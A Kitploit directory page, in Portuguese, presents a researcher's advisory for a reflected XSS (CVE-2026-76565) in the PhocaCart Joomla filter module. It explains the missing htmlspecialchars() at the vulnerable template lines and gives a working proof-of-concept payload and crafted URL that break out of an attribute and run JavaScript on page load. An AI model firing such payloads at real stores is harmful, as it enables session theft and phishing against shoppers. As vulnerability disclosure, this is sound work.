Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-76565 — XSS Refletido através dos Parâmetros de Filtro price_from & price_to no PhocaCart | Kitploit
Ferramentas/GitHubGitHub/toanln-cov/cve-2026-76565
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebPapers e Pesquisa
GitHubtoanln-cov/cve-2026-76565

CVE-2026-76565

XSS Refletido através dos Parâmetros de Filtro price_from & price_to no PhocaCart

Ver Repositório
há 3 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

XSS Refletido via Parâmetros de Filtro price_from / price_to no PhocaCart

PhocaCart ≤ 6.1.7 — Atacante não autenticado injeta JavaScript arbitrário via URL de filtro de preço manipulada

CVE CVSS v4.0 CWE-79 Affected Researcher


SUMÁRIO

O PhocaCart 6.1.7 para Joomla é vulnerável a Cross-Site Scripting (XSS) Refletido via parâmetros GET price_from e price_to quando o módulo mod_phocacart_filter está instalado e publicado. Os parâmetros são processados usando o filtro de entrada 'string' do Joomla, que aplica apenas strip_tags() — não aplica . Os valores brutos são ecoados diretamente em atributos HTML no formulário de filtro de preço renderizado pelo módulo .

Baixar ferramenta
htmlspecialchars()
value=""
mod_phocacart_filter

Um atacante entrega uma URL manipulada à vítima. Quando a vítima carrega a página, o manipulador de eventos injetado é executado no navegador dela. Não é necessária autenticação. O ataque exige que mod_phocacart_filter (um módulo distribuído separadamente) esteja instalado e publicado.


VERSÕES AFETADAS

COMPONENTVULNERABLETESTED ONFIXED
PhocaCart (com_phocacart) + mod_phocacart_filter≤ 6.1.7Joomla 5.4.7 + PhocaCart 6.1.7 + mod_phocacart_filter 6.1.66.1.8

DETALHES DA VULNERABILIDADE

Tipo: XSS Refletido (CWE-79) Autenticação necessária: Nenhuma — frontend público da loja Token CSRF necessário: Não (requisição GET) Arquivo sink: site/layouts/form_filter_horizontal_text.php:65,71

Causa raiz

O filtro de entrada 'string' do Joomla chama strip_tags() — ele remove tags HTML, mas deixa caracteres especiais HTML como ", ' e > sem codificação. Os parâmetros GET price_from e price_to são obtidos com esse filtro e armazenados em $data['getparams']. Os arquivos de template ecoam esses valores diretamente em atributos value="" sem chamar htmlspecialchars(), permitindo injeção no contexto de atributo.

Fluxo de dados — origem até o sink:

root@kitploit:~
GET ?price_from=" onmouseover="alert(document.domain)

  filter.php:831    $app->getInput()->get('price_from', '', 'string')
  └─ Joomla 'string' filter = strip_tags() only
     strip_tags('" onmouseover="alert(1)') → '" onmouseover="alert(1)'  [unchanged!]

  filter.php:494    $inA[] = $v  // no encoding
  └─ $data['getparams'] = ['" onmouseover="alert(document.domain)']

  form_filter_horizontal_text.php:65:
  └─ <input type="text" value="<?php echo $d['getparams'][0]; ?>" /> // → NO htmlspecialchars()
  → Renders: value="" onmouseover="alert(document.domain)"
  → XSS fires on mouseover

FORM_FILTER_HORIZONTAL_TEXT.PHP:65 — SINK VULNERÁVEL

root@kitploit:~
<input type="text" class="form-control" name="pricefrom"
  value="<?php echo $d['getparams'][0]; ?>"   <!-- NO htmlspecialchars() -->
  id="phPriceFrom..." />

O mesmo padrão de sink também existe em form_filter_text.php:81,87 (variante de layout vertical). Ambos os parâmetros price_from e price_to são igualmente vulneráveis.


PROVA DE CONCEITO

1. Criar URL maliciosa

O atacante constrói uma URL direcionada à visão de itens da loja com uma carga (payload) de manipulador de eventos injetada no parâmetro price_from. A carga sai do contexto do atributo value="".

root@kitploit:~
Payload (raw):     " autofocus onfocus="alert(document.domain)
URL-encoded:       %22%20autofocus%20onfocus%3D%22alert(document.domain)

Crafted URL:
http://TARGET/index.php?option=com_phocacart&view=items
  &price_from=%22%20autofocus%20onfocus%3D%22alert(document.domain)

2. Vítima carrega a página — XSS é acionado ao carregar a página

Quando a vítima abre a URL manipulada, a página de itens da loja renderiza o formulário de filtro de preço. Os atributos injetados estão presentes no elemento <input>. Com a carga autofocus onfocus, o JavaScript é executado imediatamente ao carregar a página, sem qualquer interação adicional do usuário.

HTML renderizado (vulnerável):

root@kitploit:~
<input type="text" class="form-control" name="pricefrom"
  value="" autofocus onfocus="alert(document.domain)"
  id="phPriceFromTopricefrom" />

Diálogo de alerta XSS sendo acionado no navegador da vítima — alert(document.domain) confirma a execução no frontend da loja

O XSS é acionado no navegador da vítima — alert(document.domain) confirma o contexto de execução no frontend da loja


IMPACTO

  1. Roubo de cookie de sessão — Uma carga armamentizada pode exfiltrar o cookie de sessão da vítima para um servidor controlado pelo atacante, permitindo a tomada de conta.
  2. Phishing / Coleta de credenciais — A carga pode redirecionar a vítima para uma página de login falsa hospedada no domínio do atacante, capturando credenciais sob o nome de domínio confiável da loja.
  3. Distribuição de malware — A origem confiável da loja pode ser abusada para entregar downloads drive-by ou kits de exploração a vítimas que clicam em links criados pelo atacante.

REFERÊNCIAS

  • CVE: https://www.cve.org/CVERecord?id=CVE-2026-76565
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-76565
  • Advisory do GitHub: https://github.com/advisories/GHSA-2m94-2f44-8q5p
  • Repositório do fornecedor: https://github.com/PhocaDesign/PhocaCart